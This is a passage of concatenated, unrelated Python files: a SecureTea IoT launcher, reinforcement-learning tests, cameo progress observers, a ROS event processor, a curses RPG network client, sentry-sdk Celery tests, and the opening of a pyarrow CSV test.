api_key=self.cred['iot-check']['shodan-api-key'],
ip=self.cred['iot-check']['ip'])
except KeyError:
self.logger.log(
"IoT checker parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def create_process(self):
"""
Create process for the initialized objects.
Args:
None
Raises:
None
Returns:
None
"""
if self.firewall: # if Firewall object is initialized
firewall_process = multiprocessing.Process(target=self.firewallObj.start_firewall)
self.process_pool.append(firewall_process)
if self.ids: # if IDS object is initialized
ids_process = multiprocessing.Process(target=self.ids_obj.start_ids)
self.process_pool.append(ids_process)
if self.iot_checker: # if IoT object is initialized
iot_checker_process = multiprocessing.Process(target=self.iot_checker_obj.check_shodan_range)
self.process_pool.append(iot_checker_process)
def start_process(self):
"""
Start all the process in the process pool
and terminate gracefully in Keyboard Interrupt.
Args:
None
Raises:
None
Returns:
None
"""
try:
for process in self.process_pool:
process.start()
for process in self.process_pool:
process.join()
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def start_iot_mode(self):
"""
Start SecureTea in IoT mode.
Args:
None
Raises:
None
Returns:
None
"""
# Create / initialize required objects
self.create_objects()
# Create process for the objects
self.create_process()
# Start the process
self.start_process()
|
iteration_test.py
|
import os
import pickle
import tempfile
import time
from threading import Thread
import pytest
from numpy.random import RandomState
from rlai.agents.mdp import StochasticMdpAgent
from rlai.environments.gridworld import Gridworld, GridworldFeatureExtractor
from rlai.environments.mdp import TrajectorySamplingMdpPlanningEnvironment
from rlai.gpi import PolicyImprovementEvent
from rlai.gpi.monte_carlo.iteration import iterate_value_q_pi
from rlai.gpi.utils import update_policy_iteration_plot, plot_policy_iteration
from rlai.planning.environment_models import StochasticEnvironmentModel
from rlai.policies.tabular import TabularPolicy
from rlai.q_S_A.function_approximation.estimators import ApproximateStateActionValueEstimator
from rlai.q_S_A.function_approximation.models.sklearn import SKLearnSGD
from rlai.q_S_A.tabular import TabularStateActionValueEstimator
from rlai.utils import RunThreadManager
from test.rlai.utils import tabular_estimator_legacy_eq, tabular_pi_legacy_eq
def test_iterate_value_q_pi():
random_state = RandomState(12345)
mdp_environment: Gridworld = Gridworld.example_4_1(random_state, None)
q_S_A = TabularStateActionValueEstimator(mdp_environment, 0.1, None)
mdp_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=3000,
num_episodes_per_improvement=1,
update_upon_every_visit=False,
planning_environment=None,
make_final_policy_greedy=False,
q_S_A=q_S_A
)
# uncomment the following line and run test to update fixture
# with open(f'{os.path.dirname(__file__)}/fixtures/test_monte_carlo_iteration_of_value_q_pi.pickle', 'wb') as file:
# pickle.dump((mdp_agent.pi, q_S_A), file)
with open(f'{os.path.dirname(__file__)}/fixtures/test_monte_carlo_iteration_of_value_q_pi.pickle', 'rb') as file:
pi_fixture, q_S_A_fixture = pickle.load(file)
assert tabular_pi_legacy_eq(mdp_agent.pi, pi_fixture) and tabular_estimator_legacy_eq(q_S_A, q_S_A_fixture)
def test_off_policy_monte_carlo():
random_state = RandomState(12345)
mdp_environment: Gridworld = Gridworld.example_4_1(random_state, None)
q_S_A = TabularStateActionValueEstimator(mdp_environment, 0.0, None)
# target agent
mdp_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
# episode generation (behavior) policy
off_policy_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=100,
num_episodes_per_improvement=1,
update_upon_every_visit=True,
planning_environment=None,
make_final_policy_greedy=False,
q_S_A=q_S_A,
off_policy_agent=off_policy_agent
)
# uncomment the following line and run test to update fixture
# with open(f'{os.path.dirname(__file__)}/fixtures/test_monte_carlo_off_policy_iteration_of_value_q_pi.pickle', 'wb') as file:
# pickle.dump((mdp_agent.pi, q_S_A), file)
with open(f'{os.path.dirname(__file__)}/fixtures/test_monte_carlo_off_policy_iteration_of_value_q_pi.pickle', 'rb') as file:
pi_fixture, q_S_A_fixture = pickle.load(file)
assert tabular_pi_legacy_eq(mdp_agent.pi, pi_fixture) and tabular_estimator_legacy_eq(q_S_A, q_S_A_fixture)
def test_off_policy_monte_carlo_with_function_approximation():
random_state = RandomState(12345)
mdp_environment: Gridworld = Gridworld.example_4_1(random_state, None)
q_S_A = ApproximateStateActionValueEstimator(
mdp_environment,
0.05,
SKLearnSGD(random_state=random_state, scale_eta0_for_y=False),
GridworldFeatureExtractor(mdp_environment),
None,
False,
None,
None
)
# target agent
mdp_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
# episode generation (behavior) policy
off_policy_agent = StochasticMdpAgent(
'test',
random_state,
TabularPolicy(None, None),
1
)
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=100,
num_episodes_per_improvement=1,
update_upon_every_visit=True,
planning_environment=None,
make_final_policy_greedy=False,
q_S_A=q_S_A,
off_policy_agent=off_policy_agent
)
# uncomment the following line and run test to update fixture
# with open(f'{os.path.dirname(__file__)}/fixtures/test_off_policy_monte_carlo_with_function_approximationo.pickle', 'wb') as file:
# pickle.dump((mdp_agent.pi, q_S_A), file)
with open(f'{os.path.dirname(__file__)}/fixtures/test_off_policy_monte_carlo_with_function_approximationo.pickle', 'rb') as file:
pi_fixture, q_S_A_fixture = pickle.load(file)
assert mdp_agent.pi == pi_fixture and q_S_A == q_S_A_fixture
assert str(mdp_agent.pi.estimator[mdp_environment.SS[5]][mdp_environment.SS[5].AA[1]]).startswith('-1.4524')
# make greedy
q_S_A.epsilon = 0.0
assert q_S_A.improve_policy(mdp_agent, None, PolicyImprovementEvent.MAKING_POLICY_GREEDY) == -1
assert mdp_agent.pi.estimator.epsilon == 0.0
def test_invalid_iterate_value_q_pi():
random_state = RandomState(12345)
mdp_environment: Gridworld = Gridworld.example_4_1(random_state, None)
q_S_A = TabularStateActionValueEstimator(mdp_environment, 0.0, None)
# target agent
mdp_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
# episode generation (behavior) policy
off_policy_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
with pytest.raises(ValueError, match='Planning environments are not currently supported for Monte Carlo iteration.'):
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=100,
num_episodes_per_improvement=1,
update_upon_every_visit=True,
planning_environment=TrajectorySamplingMdpPlanningEnvironment('foo', random_state, StochasticEnvironmentModel(), 100, None),
make_final_policy_greedy=False,
q_S_A=q_S_A,
off_policy_agent=off_policy_agent
)
# test warning...no off-policy agent with epsilon=0.0
q_S_A.epsilon = 0.0
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=100,
num_episodes_per_improvement=1,
update_upon_every_visit=True,
planning_environment=None,
make_final_policy_greedy=False,
q_S_A=q_S_A,
off_policy_agent=None
)
def test_iterate_value_q_pi_with_pdf():
random_state = RandomState(12345)
mdp_environment: Gridworld = Gridworld.example_4_1(random_state, None)
q_S_A = TabularStateActionValueEstimator(mdp_environment, 0.1, None)
mdp_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=3000,
num_episodes_per_improvement=1,
update_upon_every_visit=False,
planning_environment=None,
make_final_policy_greedy=False,
q_S_A=q_S_A,
num_improvements_per_plot=1500,
pdf_save_path=tempfile.NamedTemporaryFile(delete=False).name
)
with pytest.raises(ValueError, match='Epsilon must be >= 0'):
q_S_A.epsilon = -1.0
q_S_A.improve_policy(mdp_agent, states=None, event=PolicyImprovementEvent.MAKING_POLICY_GREEDY)
q_S_A.epsilon = 0.0
assert q_S_A.improve_policy(mdp_agent, None, PolicyImprovementEvent.MAKING_POLICY_GREEDY) == 14
def test_iterate_value_q_pi_multi_threaded():
thread_manager = RunThreadManager(True)
def train_thread_target():
random_state = RandomState(12345)
mdp_environment: Gridworld = Gridworld.example_4_1(random_state, None)
q_S_A = TabularStateActionValueEstimator(mdp_environment, 0.1, None)
mdp_agent = StochasticMdpAgent(
'test',
random_state,
q_S_A.get_initial_policy(),
1
)
iterate_value_q_pi(
agent=mdp_agent,
environment=mdp_environment,
num_improvements=1000000,
num_episodes_per_improvement=10,
update_upon_every_visit=False,
planning_environment=None,
make_final_policy_greedy=False,
q_S_A=q_S_A,
thread_manager=thread_manager,
num_improvements_per_plot=10
)
# premature update should have no effect
assert update_policy_iteration_plot() is None
# initialize plot from main thread
plot_policy_iteration(
iteration_average_reward=[],
iteration_total_states=[],
iteration_num_states_improved=[],
elapsed_seconds_average_rewards={},
pdf=None
)
# run training thread
run_thread = Thread(target=train_thread_target)
run_thread.start()
time.sleep(1)
# update plot asynchronously
update_policy_iteration_plot()
time.sleep(1)
# should be allowed to update plot from non-main thread
def bad_update():
with pytest.raises(ValueError, match='Can only update plot on main thread.'):
update_policy_iteration_plot()
bad_thread = Thread(target=bad_update)
bad_thread.start()
bad_thread.join()
thread_manager.abort = True
run_thread.join()
|
observers.py
|
# Copyright 2014 Novo Nordisk Foundation Center for Biosustainability, DTU.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from threading import Thread
from multiprocessing.queues import Empty
from uuid import uuid4
from blessings import Terminal
try:
from cameo.parallel import RedisQueue
except ImportError:
RedisQueue = None
from IProgress.progressbar import ProgressBar
from IProgress.widgets import Percentage, Bar
__all__ = ['CliMultiprocessProgressObserver', 'IPythonNotebookMultiprocessProgressObserver']
class AbstractParallelObserver(object):
def __init__(self, number_of_islands=None, *args, **kwargs):
assert isinstance(number_of_islands, int)
super(AbstractParallelObserver, self).__init__()
self.queue = RedisQueue(name=str(uuid4()), namespace=self.__name__)
self.clients = {}
self.run = True
self.t = None
for i in range(number_of_islands):
self._create_client(i)
def _create_client(self, i):
raise NotImplementedError
def _listen(self):
print("Start %s" % self.__name__)
while self.run:
try:
message = self.queue.get_nowait()
self._process_message(message)
except Empty:
pass
except Exception as e:
print(e)
print("Exit %s" % self.__name__)
def _process_message(self, message):
raise NotImplementedError
def start(self):
"""
Starts the observer. It is called internally before the optimization starts.
The observer will not report anything until start has been called.
"""
self.run = True
self.t = Thread(target=self._listen)
self.t.start()
def finish(self):
"""
Stops the observer. The observer will not report anything else from the optimization.
"""
self.run = False
class AbstractParallelObserverClient(object):
def __init__(self, index=None, queue=None, *args, **kwargs):
assert isinstance(index, int)
super(AbstractParallelObserverClient, self).__init__(*args, **kwargs)
self.index = index
self._queue = queue
def __call__(self, population, num_generations, num_evaluations, args):
raise NotImplementedError
def reset(self):
pass
class CliMultiprocessProgressObserver(AbstractParallelObserver):
"""
Command line progress display for multiprocess Heuristic Optimization
Attributes
__________
progress_bar: dict
Progress bar for each island.
terminal: Terminal
A blessings.Terminal object to map the bars in the terminal
"""
__name__ = "CLI Multiprocess Progress Observer"
def __init__(self, *args, **kwargs):
self.progress_bar = {}
self.terminal = Terminal()
super(CliMultiprocessProgressObserver, self).__init__(*args, **kwargs)
def _create_client(self, i):
self.clients[i] = CliMultiprocessProgressObserverClient(index=i, queue=self.queue)
def _process_message(self, message):
i = message['index']
if i not in self.progress_bar:
print("")
label = "Island %i: " % (i + 1)
pos = abs(len(self.clients) - i)
writer = self.TerminalWriter((self.terminal.height or 1) - pos, self.terminal)
self.progress_bar[i] = ProgressBar(maxval=message['max_evaluations'],
widgets=[label, Bar(), Percentage()],
fd=writer)
self.progress_bar[i].start()
self.progress_bar[i].update(message['num_evaluations'])
def _listen(self):
AbstractParallelObserver._listen(self)
for i, progress in self.progress_bar.items():
progress.finish()
class TerminalWriter(object):
"""
Writer wrapper to write the progress in a specific terminal position
"""
def __init__(self, pos, term):
self.pos = pos
self.term = term
def write(self, string):
with self.term.location(0, self.pos):
print(string)
class CliMultiprocessProgressObserverClient(AbstractParallelObserverClient):
__name__ = "CLI Multiprocess Progress Observer"
def __init__(self, *args, **kwargs):
super(CliMultiprocessProgressObserverClient, self).__init__(*args, **kwargs)
def __call__(self, population, num_generations, num_evaluations, args):
self._queue.put_nowait({
'index': self.index,
'num_evaluations': num_evaluations,
'max_evaluations': args.get('max_evaluations', 50000)
})
def reset(self):
pass
class IPythonNotebookMultiprocessProgressObserver(AbstractParallelObserver):
"""
IPython Notebook Progress Observer for multiprocess Heuristic Optimization
Attributes
__________
progress_bar: dict
Progress bar for each island.
"""
__name__ = "IPython Notebook Multiprocess Progress Observer"
def __init__(self, *args, **kwargs):
self.progress_bar = {}
super(IPythonNotebookMultiprocessProgressObserver, self).__init__(*args, **kwargs)
def _create_client(self, i):
self.clients[i] = IPythonNotebookMultiprocessProgressObserverClient(queue=self.queue, index=i)
def _process_message(self, message):
i = message['index']
if i not in self.progress_bar:
label = "Island %i" % (i + 1)
self.progress_bar[i] = ProgressBar(maxval=message['max_evaluations'],
widgets=[label, Bar(), Percentage()])
self.progress_bar[message['index']].start()
self.progress_bar[message['index']].set(message['progress'])
class IPythonNotebookMultiprocessProgressObserverClient(AbstractParallelObserverClient):
__name__ = "IPython Notebook Multiprocess Progress Observer"
def __init__(self, *args, **kwargs):
super(IPythonNotebookMultiprocessProgressObserverClient, self).__init__(*args, **kwargs)
def __call__(self, population, num_generations, num_evaluations, args):
p = (float(num_evaluations) / float(args.get('max_evaluations', 50000))) * 100.0
try:
self._queue.put_nowait({'progress': p, 'index': self.index})
except Exception:
pass
def reset(self):
pass
|
main.py
|
from ros.processor.inventory_events_consumer import InventoryEventsConsumer
from ros.processor.insights_engine_result_consumer import InsightsEngineResultConsumer
from ros.processor.garbage_collector import GarbageCollector
from prometheus_client import start_http_server
import threading
from ros.lib.config import METRICS_PORT
def process_engine_results():
processor = InsightsEngineResultConsumer()
processor.run()
def events_processor():
processor = InventoryEventsConsumer()
processor.run()
def garbage_collector():
collector = GarbageCollector()
collector.run()
if __name__ == "__main__":
# Start processing in 2 different threads
engine_results = threading.Thread(name='process-engine-results', target=process_engine_results)
events = threading.Thread(name='events-processor', target=events_processor)
collector = threading.Thread(name='garbage-collector', target=garbage_collector)
events.start()
engine_results.start()
collector.start()
start_http_server(METRICS_PORT)
# Wait for threads to finish
events.join()
engine_results.join()
collector.join()
|
main.py
|
# / ┌─────────────┐ \ #
# |==│ By BitExpo3 │==| #
# \ └─────────────┘ / #
import socket
import threading
import sys
import json
import curses
from curses import wrapper
import yaml
import os
wmain = None
wside = None
wbar = None
winy, winx = None, None
state = ""
# Official server IP & PORT coming soon!
SERVER = socket.gethostbyname(socket.gethostname()) # SERVER IP: STR ("127.0.0.1")
PORT = 5052 # SERVER PORT: INT (5000)
ADDR = (SERVER, PORT)
HEADER = 64
FORMAT = "utf-8"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(2)
RUNNING = True
GAMEVERSION = 1
LOADED = False
DATA = {}
TUI = {
"msg": "",
"chat": []
}
class YamlManager:
def read(directory):
with open(directory) as file:
try:
output = yaml.safe_load(file)
return output
except yaml.YAMLError as exc:
print(exc)
return False
def write(directory,data):
with open(directory, 'w') as file:
yaml.dump(data, file)
def dir(directory):
tmp = []
for files in os.listdir(directory):
if os.path.isdir(os.path.join(directory, files)):
tmp.append(files)
return tmp
def file(directory):
tmp = []
for files in os.listdir(directory):
if os.path.isfile(os.path.join(directory, files)):
tmp.append(files)
return tmp
def name(file):
return file.split(".")[0]
file = YamlManager
class ColorClass:
GREEN = None
RED = None
YELLOW = None
BLUE = None
PURPLE = None
def init(self):
curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_BLUE, curses.COLOR_BLACK)
curses.init_pair(5, curses.COLOR_MAGENTA, curses.COLOR_BLACK)
self.GREEN = curses.color_pair(1)
self.RED = curses.color_pair(2)
self.YELLOW = curses.color_pair(3)
self.BLUE = curses.color_pair(4)
self.PURPLE = curses.color_pair(5)
color = ColorClass
class ProtocolClass():
SOC = "s" # socket management
ACC = "a" # account type command
REA = "r" # command with read nature
WRI = "w" # command with write nature
msg_types = ProtocolClass
def resize(stdscr):
global wmain, wside, wbar, winy, winx
winy,winx = stdscr.getmaxyx()
wmain = curses.newwin(winy-3,winx-29,3,29)
wside = curses.newwin(winy-3,30,3,0)
wbar = curses.newwin(4,winx,0,0)
def update(data):
global state, substate
wmain.clear()
wside.clear()
wbar.clear()
wmain.border(ord("│"),ord("│"),ord("─"),ord("─"),ord("─"),ord("┘"),ord("┘"),ord("┘"))
wside.border(ord("│"),ord("│"),ord("─"),ord("─"),ord("└"),ord("─"),ord("└"),ord("┘"))
wbar.border(ord("│"),ord("│"),ord("─"),ord("─"),ord("┌"),ord("┐"),ord("└"),ord("┘"))
wbar.addstr(1,1,f"AnotherRPG")
if state == "login":
wbar.addstr(2,1,"Log-In to account!")
else:
if LOADED:
print(data)
wbar.addstr(2,1,f"Inv: " + str(data["weight"]))
amount = 0
for i in range(len(TUI["chat"])):
if amount >= winy-5:
break
wmain.addstr((winy-5)-i,1,TUI["chat"][i][0] + ": " + TUI["chat"][i][1])
amount += 1
if TUI["msg"] != "":
wbar.addstr(1,11," // " + TUI["msg"])
wbar.refresh()
wmain.refresh()
wside.refresh()
curses.curs_set(0)
def getstring(max,title,var):
wmain.hline(winy-6, 1, ord("─"), winx-31)
wmain.addstr(winy-6,2,title)
wmain.addstr(winy-5,1," "*(winx-31))
wmain.addstr(winy-5,1,var + ": ")
wmain.addstr(winy-6,winx-30,"┘")
wmain.addstr(winy-5,winx-(36 + len(str(max))),f"(Max {max})")
wmain.refresh()
wmain.move(winy-5,3 + len(str(var)))
curses.echo()
string = wmain.getstr(max).decode().strip()
curses.noecho()
return str(string)
def recieve():
global LOADED
global RUNNING
global DATA
global state, substate
while True:
if not RUNNING:
print("Closing Thread..")
return
try:
msg_length = client.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = client.recv(msg_length).decode(FORMAT).split("\n")
if msg[0] == msg_types.SOC:
if msg[1] == "!":
print("Server Closed!")
RUNNING = False
sys.exit()
elif msg[1].startswith("v"):
tmp = str(msg[1].split(" ")[1])
if str(tmp) != str(GAMEVERSION):
print("Wrong version! Server: v" + str(tmp) + " Client: v" + str(GAMEVERSION))
print("- Go to: [https://github.com/BitExpo3/Client] for the latest release!")
print("('\\n' to leave)")
RUNNING = False
send(msg_types.SOC + "\n!")
sys.exit()
else:
print("Client Up To Date! (v" + str(GAMEVERSION) + ")")
elif msg[0] == msg_types.REA:
if msg[1].startswith("msg "):
tmp = msg[1].split(" ")
TUI["chat"].insert(0,[tmp[1],msg[1][len("msg " + tmp[1] + " "):]])
else:
if msg[1] == "FINAL":
LOADED = True
else:
data_dict = json.loads(str(msg[2]).replace("'","\""))
DATA[msg[1]] = data_dict[0]
elif msg[0] == msg_types.ACC:
if len(msg) > 1:
if msg[1] == "0":
TUI["msg"] = ("Invalid email syntax!")
elif msg[1] == "1":
TUI["msg"] = ("User or Password incorrect!")
elif msg[1] == "2":
TUI["msg"] = ("Logged in to account!")
state = "game"
send(msg_types.REA + "\n" + "all")
elif msg[1] == "3":
TUI["msg"] = ("Account already exists!")
elif msg[1] == "4":
TUI["msg"] = ("Verification email sent! Please send token with '!token [token]'")
elif msg[1] == "5":
TUI["msg"] = ("You do not have a pending token!")
elif msg[1] == "6":
TUI["msg"] = ("Token is not valid!")
elif msg[1] == "7":
TUI["msg"] = ("You have created an account!")
state = "game"
send(msg_types.REA + "\n" + "all")
TUI["msg"] = ("Logged in to account!")
elif msg[1] == "8":
TUI["msg"] = ("You must be logged in to do this!")
#update(DATA)
except TimeoutError:
pass
def send(msg):
message = msg.encode(FORMAT)
msg_length = len(message)
send_length = str(msg_length).encode(FORMAT)
send_length += b' ' * (HEADER - len(send_length))
client.send(send_length)
client.send(message)
def main(stdscr):
global RUNNING
global wmain, wside, wbar
global winy, winx
global state, TUI
color.init(color)
resize(stdscr)
stdscr.timeout(100)
worked = True
try:
client.connect(ADDR)
except:
print("[ERROR] Connection unsucessful, please try again later.")
worked = False
RUNNING = False
sys.exit()
input()
if worked:
state = "login"
TUI["msg"] = ("Connected to server!")
thread1 = threading.Thread(target=recieve)
thread1.isDaemon = True
thread1.start()
while RUNNING:
try:
key = stdscr.getch()
except curses.error:
key = None
if key == ord("q"):
RUNNING = False
send(msg_types.SOC + "\n!")
sys.exit()
elif key == ord("m"):
msg = getstring(50,"Message","")
send(msg_types.WRI + "\nmsg " + msg)
elif key == ord("t"):
msg = getstring(50,"Command","")
msg = msg.lower().strip()
if msg == "login":
name = getstring(30,"Login","User")
password = getstring(20,"Login","Pass")
send(msg_types.ACC + "\n0\n" + name + "\n" + password)
elif msg == "register":
if state == "login":
email = getstring(30,"Register","EMail")
password = getstring(20,"Register","Pass")
name = getstring(20,"Register","User")
print(password)
print(password.isalnum())
print(len(password) <= 20)
print(len(password) >= 5)
if password.isalnum() and len(password) <= 20 and len(password) >= 5 & name.isalnum() & len(name) <= 20 & len(name) >= 3:
send(msg_types.ACC + "\n1\n" + email + "\n" + password + "\n" + name)
else:
TUI["msg"] = ("Password and User must be alphanumeric, and 5 - 20 characters long!")
else:
TUI["msg"] = ("You can not do this while logged in!")
elif msg == "token":
token = getstring(30,"Register","Token")
if state == "login":
send(msg_types.ACC + "\n2\n" + token)
else:
TUI["msg"] = ("You can not do this while logged in!")
else:
TUI["msg"] = "Unknown command."
if key == 546:
resize(stdscr)
update(DATA)
else:
update(DATA)
wrapper(main)
|
test_celery.py
|
import threading
import pytest
pytest.importorskip("celery")
from sentry_sdk import Hub, configure_scope
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk._compat import text_type
from celery import Celery, VERSION
from celery.bin import worker
@pytest.fixture
def connect_signal(request):
def inner(signal, f):
signal.connect(f)
request.addfinalizer(lambda: signal.disconnect(f))
return inner
@pytest.fixture
def init_celery(sentry_init):
def inner(propagate_traces=True, **kwargs):
sentry_init(
integrations=[CeleryIntegration(propagate_traces=propagate_traces)],
**kwargs
)
celery = Celery(__name__)
if VERSION < (4,):
celery.conf.CELERY_ALWAYS_EAGER = True
else:
celery.conf.task_always_eager = True
return celery
return inner
@pytest.fixture
def celery(init_celery):
return init_celery()
@pytest.fixture(
params=[
lambda task, x, y: (task.delay(x, y), {"args": [x, y], "kwargs": {}}),
lambda task, x, y: (task.apply_async((x, y)), {"args": [x, y], "kwargs": {}}),
lambda task, x, y: (
task.apply_async(args=(x, y)),
{"args": [x, y], "kwargs": {}},
),
lambda task, x, y: (
task.apply_async(kwargs=dict(x=x, y=y)),
{"args": [], "kwargs": {"x": x, "y": y}},
),
]
)
def celery_invocation(request):
"""
Invokes a task in multiple ways Celery allows you to (testing our apply_async monkeypatch).
Currently limited to a task signature of the form foo(x, y)
"""
return request.param
def test_simple(capture_events, celery, celery_invocation):
events = capture_events()
@celery.task(name="dummy_task")
def dummy_task(x, y):
foo = 42 # noqa
return x / y
with Hub.current.start_span() as span:
celery_invocation(dummy_task, 1, 2)
_, expected_context = celery_invocation(dummy_task, 1, 0)
(event,) = events
assert event["contexts"]["trace"]["trace_id"] == span.trace_id
assert event["contexts"]["trace"]["span_id"] != span.span_id
assert event["transaction"] == "dummy_task"
assert "celery_task_id" in event["tags"]
assert event["extra"]["celery-job"] == dict(
task_name="dummy_task", **expected_context
)
(exception,) = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
assert exception["mechanism"]["type"] == "celery"
assert exception["stacktrace"]["frames"][0]["vars"]["foo"] == "42"
@pytest.mark.parametrize("task_fails", [True, False], ids=["error", "success"])
def test_transaction_events(capture_events, init_celery, celery_invocation, task_fails):
celery = init_celery(traces_sample_rate=1.0)
@celery.task(name="dummy_task")
def dummy_task(x, y):
return x / y
# XXX: For some reason the first call does not get instrumented properly.
celery_invocation(dummy_task, 1, 1)
events = capture_events()
with Hub.current.start_span(transaction="submission") as span:
celery_invocation(dummy_task, 1, 0 if task_fails else 1)
if task_fails:
error_event = events.pop(0)
assert error_event["contexts"]["trace"]["trace_id"] == span.trace_id
assert error_event["exception"]["values"][0]["type"] == "ZeroDivisionError"
execution_event, submission_event = events
assert execution_event["transaction"] == "dummy_task"
assert submission_event["transaction"] == "submission"
assert execution_event["type"] == submission_event["type"] == "transaction"
assert execution_event["contexts"]["trace"]["trace_id"] == span.trace_id
assert submission_event["contexts"]["trace"]["trace_id"] == span.trace_id
if task_fails:
assert execution_event["contexts"]["trace"]["status"] == "internal_error"
else:
assert execution_event["contexts"]["trace"]["status"] == "ok"
assert execution_event["spans"] == []
assert submission_event["spans"] == [
{
u"description": u"dummy_task",
u"op": "celery.submit",
u"parent_span_id": submission_event["contexts"]["trace"]["span_id"],
u"same_process_as_parent": True,
u"span_id": submission_event["spans"][0]["span_id"],
u"start_timestamp": submission_event["spans"][0]["start_timestamp"],
u"timestamp": submission_event["spans"][0]["timestamp"],
u"trace_id": text_type(span.trace_id),
}
]
def test_no_stackoverflows(celery):
"""We used to have a bug in the Celery integration where its monkeypatching
was repeated for every task invocation, leading to stackoverflows.
See https://github.com/getsentry/sentry-python/issues/265
"""
results = []
@celery.task(name="dummy_task")
def dummy_task():
with configure_scope() as scope:
scope.set_tag("foo", "bar")
results.append(42)
for _ in range(10000):
dummy_task.delay()
assert results == [42] * 10000
with configure_scope() as scope:
assert not scope._tags
def test_simple_no_propagation(capture_events, init_celery):
celery = init_celery(propagate_traces=False)
events = capture_events()
@celery.task(name="dummy_task")
def dummy_task():
1 / 0
with Hub.current.start_span() as span:
dummy_task.delay()
(event,) = events
assert event["contexts"]["trace"]["trace_id"] != span.trace_id
assert event["transaction"] == "dummy_task"
(exception,) = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
def test_ignore_expected(capture_events, celery):
events = capture_events()
@celery.task(name="dummy_task", throws=(ZeroDivisionError,))
def dummy_task(x, y):
return x / y
dummy_task.delay(1, 2)
dummy_task.delay(1, 0)
assert not events
def test_broken_prerun(init_celery, connect_signal):
from celery.signals import task_prerun
stack_lengths = []
def crash(*args, **kwargs):
# scope should exist in prerun
stack_lengths.append(len(Hub.current._stack))
1 / 0
# Order here is important to reproduce the bug: In Celery 3, a crashing
# prerun would prevent other preruns from running.
connect_signal(task_prerun, crash)
celery = init_celery()
assert len(Hub.current._stack) == 1
@celery.task(name="dummy_task")
def dummy_task(x, y):
stack_lengths.append(len(Hub.current._stack))
return x / y
if VERSION >= (4,):
dummy_task.delay(2, 2)
else:
with pytest.raises(ZeroDivisionError):
dummy_task.delay(2, 2)
assert len(Hub.current._stack) == 1
if VERSION < (4,):
assert stack_lengths == [2]
else:
assert stack_lengths == [2, 2]
@pytest.mark.xfail(
(4, 2, 0) <= VERSION,
strict=True,
reason="https://github.com/celery/celery/issues/4661",
)
def test_retry(celery, capture_events):
events = capture_events()
failures = [True, True, False]
runs = []
@celery.task(name="dummy_task", bind=True)
def dummy_task(self):
runs.append(1)
try:
if failures.pop(0):
1 / 0
except Exception as exc:
self.retry(max_retries=2, exc=exc)
dummy_task.delay()
assert len(runs) == 3
assert not events
failures = [True, True, True]
runs = []
dummy_task.delay()
assert len(runs) == 3
(event,) = events
exceptions = event["exception"]["values"]
for e in exceptions:
assert e["type"] == "ZeroDivisionError"
@pytest.mark.forked
@pytest.mark.skipif(VERSION < (4,), reason="in-memory backend broken")
def test_transport_shutdown(request, celery, capture_events_forksafe, tmpdir):
events = capture_events_forksafe()
celery.conf.worker_max_tasks_per_child = 1
celery.conf.broker_url = "memory://localhost/"
celery.conf.broker_backend = "memory"
celery.conf.result_backend = "file://{}".format(tmpdir.mkdir("celery-results"))
celery.conf.task_always_eager = False
runs = []
@celery.task(name="dummy_task", bind=True)
def dummy_task(self):
runs.append(1)
1 / 0
res = dummy_task.delay()
w = worker.worker(app=celery)
t = threading.Thread(target=w.run)
t.daemon = True
t.start()
with pytest.raises(Exception):
# Celery 4.1 raises a gibberish exception
res.wait()
event = events.read_event()
(exception,) = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
events.read_flush()
# if this is nonempty, the worker never really forked
assert not runs
|
test_csv.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import bz2
from datetime import date, datetime
from decimal import Decimal
import gc
import gzip
import io
import itertools
import os
import pickle
import shutil
import signal
import string
import sys
import tempfile
import threading
import time
import unittest
import pytest
import numpy as np
import pyarrow as pa
from pyarrow.csv import (
open_csv, read_csv, ReadOptions, ParseOptions, ConvertOptions, ISO8601,
write_csv, WriteOptions)
def generate_col_names():
# 'a', 'b'... 'z', then 'aa', 'ab'...
